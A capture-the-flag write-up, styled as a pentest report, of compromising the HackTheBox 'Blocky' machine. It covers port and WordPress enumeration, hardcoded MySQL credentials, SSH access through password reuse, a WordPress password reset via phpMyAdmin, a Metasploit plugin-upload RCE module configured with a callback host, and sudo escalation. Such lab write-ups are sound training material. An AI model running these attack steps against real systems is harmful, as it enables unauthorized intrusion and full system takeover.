Exploring Blocky CTF:
Table of Contents
ToggleAn Attack Vector on Minecraft
This is a writeup presented by Behind Security as part of the OSCP Roadmap series, focusing on the Blocky CTF from HackTheBox. The writeup takes the form of a detailed pentest report.
Blocky CTF
This challenge showcases the dangers of poor password practices and the exposure of internal files on a publicly accessible system. Moreover, it highlights a significant potential attack vector - Minecraft.
HackTheBox
Hack The Box gives individuals, businesses and universities the tools they need to continuously improve their cybersecurity capabilities — all in one place.
BEHIND SECURITY
Behind Security is an online platform dedicated to providing informative articles on cybersecurity, privacy, and programming.
Introduction
Behind Security was tasked with performing an penetration test towards Blocky. The focus of this test is to perform attacks, similar to those of a hacker and attempt to infiltrate Blocky’s internal systems. In order to access the system, it is required to add an entry to the pentester’s /etc/hosts file as is shown below.
High-Level Summary
The pentest report conducted by the Behind Security unveiled several vulnerabilities and inadequate security practices within the Blocky organization. During the assessment, the following key findings were identified:
- Hardcoded Credentials: During the assessment, Behind Security uncovered hardcoded credentials for the root user of the MySQL database within the source code of a java plugin. With these credentials, Behind Security achieved a complete compromise of the MySQL database.
- Password Reuse: Password reuse practice was observed, enabling unauthorized access to multiple systems. Implementing a robust password policy is advised.
- User notch Privileges: The user notch had unrestricted sudo privileges, leading to complete compromise of the machine through a simple sudo su command. Reviewing and appropriately restricting sudo privileges is essential to prevent misuse.
Methodologies
- Information Gathering (Reconnaissance): Using both passive and active techniques, we gathered relevant information on potential entry points.
- Vulnerability Assessment: Through a combination of automated scanning tools and manual analysis, we performed an exhaustive vulnerability assessment. The assessment covered the entire attack surface, including network services, web applications, and databases.
- Exploitation and Gain of Access: Based on the identified vulnerabilities, we attempted to exploit them to gain unauthorized access to the systems and applications. This step allowed us to validate the existence and potential impact of each vulnerability.
- Privilege Escalation and Lateral Movement: Following successful initial access, we focused on privilege escalation to elevate our access privileges. Additionally, we explored the potential for lateral movement within the internal network, simulating real-world scenarios of an attacker’s progression.
- Documentation and Reporting: Detailed documentation of the findings, including technical descriptions, potential impacts, and evidence of exploitation, was recorded throughout the testing process.
Independent Challenge – 10.10.10.37
Service Enumeration
IP Address | Ports Open |
---|---|
10.10.10.37 | TCP: 21, 22, 80, 8192, 25565 |
In order to successfully discover valid ports on the host, Behind Security issued the command: nmap -sC -sV -T4 -v -p- 10.10.10.37. The output is provided below.
Web Server Enumeration
The web server’s HTTP headers reveal its version as Apache httpd 2.4.18. Additionally, we identified the presence of a WordPress CMS running on the web server. These findings provide important insights into the system’s configuration and software stack, which will be taken into consideration during the subsequent phases of the assessment.
WordPress Enumeration
During enumeration of the WordPress instance hosted at IP address 10.10.10.37, Behind Security successfully identified a valid user within the CMS. This discovery may provide a potential entry point for further analysis and testing.
User discovered: notch
Command: wpscan –url http://blocky.htb/ -e u
Snippet of the finding:
[+] notch
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://blocky.htb/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
Directory Bruteforcing
Behind Security performed directory brute-forcing to gain additional insights into the website’s structure. This approach allowed us to explore the directory tree and discover hidden resources, providing valuable information for further assessment.
Command: gobuster dir -u http://blocky.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20
Output of the command:
Hardcoded Credentials
During the assessment, Behind Security uncovered hardcoded credentials for the root user of the MySQL database within the BlockyCore.jar plugin, accessible via http://blocky.htb/plugins/files/BlockyCore.jar
For analysis, Behind Security utilized the tool Ghidra. The provided code snippet highlights the presence of hardcoded credentials:
To reproduce the finding, the user should follow these steps:
- Open Ghidra: Launch Ghidra, the analysis tool we’ll be using to explore the BlockyCore.jar file.
- Create a New Project: Create a new project within Ghidra to organize your analysis.
- Run the Project: Once the project is set up, run it to begin the analysis process.
- Import the BlockyCore.jar File: Import the BlockyCore.jar file into the project. This can usually be done by selecting “Import File” or a similar option within the Ghidra interface.
- File Structure Detection: Ghidra will automatically detect the file structure of the imported BlockyCore.jar file, aiding in the analysis.
- Access the BlockyCore.class: From the detected file structure, locate and select the BlockyCore.class file for further examination.
- Screenshot for Reference: For visual guidance, refer to the provided screenshot, which showcases the relevant section of the analysis.
Initial Access – SSH Login
Vulnerability Explanation: By leveraging the same password previously identified for the root user of the MySQL database, Behind Security was able to log in as the user notch via SSH. This finding serves as concrete evidence that identical credentials were being employed across multiple apps and services within the organization, posing a high security risk.
Vulnerability Fix: Deploy a strict password policy that enforces unique passwords for each system, service, or application used within the organization.
Severity: Critical
Steps to Reproduce the Attack: Log in via SSH as notch, specifying the previously discovered password for the root user of the MySQL database in the report.
Initial Access – RCE via Uploading and Activating a Vulnerable WordPress Plugin
Vulnerability Explanation: During the engagement, Behind Security was able to identify a critical vulnerability that allows an attacker to gain remote code execution on the system. The attack scenario involves exploiting the ability to upload and activate a vulnerable plugin on the WordPress instance. Once the vulnerable plugin is activated, the attacker can leverage a separate remote code execution vulnerability present in the plugin to execute arbitrary code.
Vulnerability Fix: Fix the Hard-coded Credentials previously addressed.
Severity: High
Steps to Reproduce the Attack:
- Behind Security gained unauthorized access to the target system by successfully logging in to the phpMyAdmin instance at http://blocky.htb/phpmyadmin/ and then proceeded to change the password for the WordPress user “notch” to “pwned”. Head to the WordPress database, and then “wp_users” table. There you can change information about the users, including password. There’s an online tool available to generate a valid WordPress password hash.
- Leveraging the plugin upload functionality within WordPress, Behind Security uploaded ReFlex Gallery Version 3.1.3 onto the system and activated the uploaded plugin. The direct download link to the vulnerable plugin can be found here.
- Then, Behind Security used a metasploit module (unix/webapp/wp_reflexgallery_file_upload) to effectively trigger the underlying vulnerability and obtain Remote Code Execution. The module configuration can be found below.
msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set RHOSTS 10.10.10.37
msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set LHOST tun0
msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set VHOST blocky.htb
msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > run
Post-Exploitation
User notch has unrestricted sudo capabilities, granting complete administrative privileges on the machine. As a result, Behind Security achieved a full compromise of the system with relative ease, utilizing a simple sudo su command. This successful escalation of privileges demonstrates the critical importance of properly managing sudo access to prevent unauthorized users from gaining extensive control over the system. Immediate action should be taken to review and restrict sudo privileges for notch and other users to enhance overall security and mitigate potential exploitation.
Conclusion
We hope you have found our content useful and invite you to explore more of our website to discover other interesting topics we cover. From cybersecurity to programming, we strive to provide our readers with the latest and most relevant information that can help them stay informed and ahead of the curve. We are committed to providing the best user experience to you and are open to feedback and suggestions through our contact form. Thank you for choosing BehindSecurity, we hope to see you again soon!